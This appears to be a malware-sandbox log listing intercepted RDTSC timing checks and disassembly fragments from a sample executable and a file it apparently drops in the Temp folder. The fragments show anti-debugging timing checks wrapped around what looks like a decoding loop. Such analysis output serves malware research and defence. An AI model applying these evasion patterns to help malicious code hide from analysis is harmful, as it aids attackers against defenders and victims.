Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004EFFEB second address: 00000000004F0007 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB219Ch 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], eax 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004F0007 second address: 00000000004F000D instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004F000D second address: 00000000004F002E instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB21A4h 0x00000009 popad 0x0000000a popfd 0x0000000b pushfd 0x0000000c pushad 0x0000000d xor ecx, ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004F0275 second address: 00000000004F027B instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004EFB01 second address: 00000000004EFB07 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004EFB07 second address: 00000000004EFB20 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184D54F5Ah 0x00000009 popad 0x0000000a popfd 0x0000000b push 00000005h 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004EFB20 second address: 00000000004EFB26 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004EFB26 second address: 00000000004EFB4B instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184D54F63h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, 004EFE72h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004EFB4B second address: 00000000004EFB51 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004EFB51 second address: 00000000004EFB74 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184D54F65h 0x00000009 popad 0x0000000a popfd 0x0000000b push eax 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004EFB74 second address: 00000000004EFB7A instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004EFB7A second address: 00000000004EFB9B instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184D54F5Fh 0x00000009 popad 0x0000000a popfd 0x0000000b push 000013C5h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004EFB9B second address: 00000000004EFBA1 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004EFBA1 second address: 00000000004EFBC1 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184D54F5Eh 0x00000009 popad 0x0000000a popfd 0x0000000b push 004F06A6h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004EFBC1 second address: 00000000004EFBC7 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004EFBC7 second address: 00000000004EFBEA instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184D54F61h 0x00000009 popad 0x0000000a popfd 0x0000000b mov ebx, 004EFED6h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004EFBEA second address: 00000000004EFBF0 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004EFBF0 second address: 00000000004EFEDD instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184D54F62h 0x00000009 popad 0x0000000a popfd 0x0000000b call ebx 0x0000000d push ebp 0x0000000e mov ebp, esp 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004EFEDD second address: 00000000004EFEE3 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004EFEE3 second address: 00000000004EFF03 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184D54F62h 0x00000009 popad 0x0000000a popfd 0x0000000b push ecx 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004EFF03 second address: 00000000004EFF09 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004EFF09 second address: 00000000004EFF31 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184D54F64h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004EFF31 second address: 00000000004EFF37 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004EFF37 second address: 00000000004EFF56 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184D54F5Bh 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004EFF56 second address: 00000000004EFF5C instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004EFF5C second address: 00000000004F002E instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184D54F5Ch 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007F8184D55009h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F002E second address: 00000000004F0034 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F0034 second address: 00000000004F0062 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184D54F65h 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp-04h] 0x0000000e cmp ecx, dword ptr [ebp+0Ch] 0x00000011 jnc 00007F8184D55169h 0x00000017 pushfd 0x00000018 pushad 0x00000019 xor ecx, ecx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F0062 second address: 00000000004F0068 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F0068 second address: 00000000004F0085 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184D54F5Dh 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F0085 second address: 00000000004F008B instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F008B second address: 00000000004F00A5 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184D54F5Bh 0x00000009 popad 0x0000000a popfd 0x0000000b xor edx, edx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F00A5 second address: 00000000004F00AB instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F00AB second address: 00000000004F00C7 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184D54F5Ch 0x00000009 popad 0x0000000a popfd 0x0000000b div dword ptr [ebp+14h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F00C7 second address: 00000000004F00CD instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F00CD second address: 00000000004F00EF instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184D54F62h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp+10h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F00EF second address: 00000000004F00F5 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F00F5 second address: 00000000004F0116 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184D54F60h 0x00000009 popad 0x0000000a popfd 0x0000000b movsx ecx, byte ptr [eax+edx] 0x0000000f pushfd 0x00000010 pushad 0x00000011 xor ecx, ecx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F0116 second address: 00000000004F011C instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F011C second address: 00000000004F0142 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184D54F66h 0x00000009 popad 0x0000000a popfd 0x0000000b mov edx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F0142 second address: 00000000004F0148 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F0148 second address: 00000000004F0167 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184D54F5Fh 0x00000009 popad 0x0000000a popfd 0x0000000b add edx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F0167 second address: 00000000004F016D instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F016D second address: 00000000004F0188 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184D54F5Bh 0x00000009 popad 0x0000000a popfd 0x0000000b movzx eax, byte ptr [edx] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F0188 second address: 00000000004F018E instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F018E second address: 00000000004F01B3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184D54F66h 0x00000009 popad 0x0000000a popfd 0x0000000b sub eax, ecx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F01B3 second address: 00000000004F01B9 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F01B9 second address: 00000000004F01DA instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184D54F61h 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F01DA second address: 00000000004F01E0 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F01E0 second address: 00000000004F0203 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184D54F63h 0x00000009 popad 0x0000000a popfd 0x0000000b add ecx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F0203 second address: 00000000004F0209 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F0209 second address: 00000000004F0226 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184D54F5Eh 0x00000009 popad 0x0000000a popfd 0x0000000b mov byte ptr [ecx], al 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F0226 second address: 00000000004F022C instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F022C second address: 00000000004EFF9F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184D54F5Eh 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007F8184D54CA8h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004EFF9F second address: 00000000004EFFA5 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004EFFA5 second address: 00000000004EFFC3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184D54F5Eh 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004EFFC3 second address: 00000000004EFFC9 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004EFFC9 second address: 00000000004EFFE5 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184D54F5Ch 0x00000009 popad 0x0000000a popfd 0x0000000b add eax, 01h 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004EFFE5 second address: 00000000004EFFEB instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004EFFEB second address: 00000000004F0007 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184D54F5Ch 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], eax 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F0007 second address: 00000000004F000D instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F000D second address: 00000000004F002E instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184D54F64h 0x00000009 popad 0x0000000a popfd 0x0000000b pushfd 0x0000000c pushad 0x0000000d xor ecx, ecx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F0275 second address: 00000000004F027B instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004EFB07 second address: 00000000004EFB20 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB219Ah 0x00000009 popad 0x0000000a popfd 0x0000000b push 00000005h 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004EFB26 second address: 00000000004EFB4B instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB21A3h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, 004EFE72h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004EFB51 second address: 00000000004EFB74 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB21A5h 0x00000009 popad 0x0000000a popfd 0x0000000b push eax 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004EFB7A second address: 00000000004EFB9B instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB219Fh 0x00000009 popad 0x0000000a popfd 0x0000000b push 000013C5h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004EFBA1 second address: 00000000004EFBC1 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB219Eh 0x00000009 popad 0x0000000a popfd 0x0000000b push 004F06A6h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004EFBC7 second address: 00000000004EFBEA instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB21A1h 0x00000009 popad 0x0000000a popfd 0x0000000b mov ebx, 004EFED6h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004EFBF0 second address: 00000000004EFEDD instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB21A2h 0x00000009 popad 0x0000000a popfd 0x0000000b call ebx 0x0000000d push ebp 0x0000000e mov ebp, esp 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004EFEE3 second address: 00000000004EFF03 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB21A2h 0x00000009 popad 0x0000000a popfd 0x0000000b push ecx 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004EFF09 second address: 00000000004EFF31 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB21A4h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004EFF37 second address: 00000000004EFF56 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB219Bh 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004EFF5C second address: 00000000004F002E instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB219Ch 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007F8184DB2249h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F0034 second address: 00000000004F0062 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB21A5h 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp-04h] 0x0000000e cmp ecx, dword ptr [ebp+0Ch] 0x00000011 jnc 00007F8184DB23A9h 0x00000017 pushfd 0x00000018 pushad 0x00000019 xor ecx, ecx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F0068 second address: 00000000004F0085 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB219Dh 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F008B second address: 00000000004F00A5 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB219Bh 0x00000009 popad 0x0000000a popfd 0x0000000b xor edx, edx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F00AB second address: 00000000004F00C7 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB219Ch 0x00000009 popad 0x0000000a popfd 0x0000000b div dword ptr [ebp+14h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
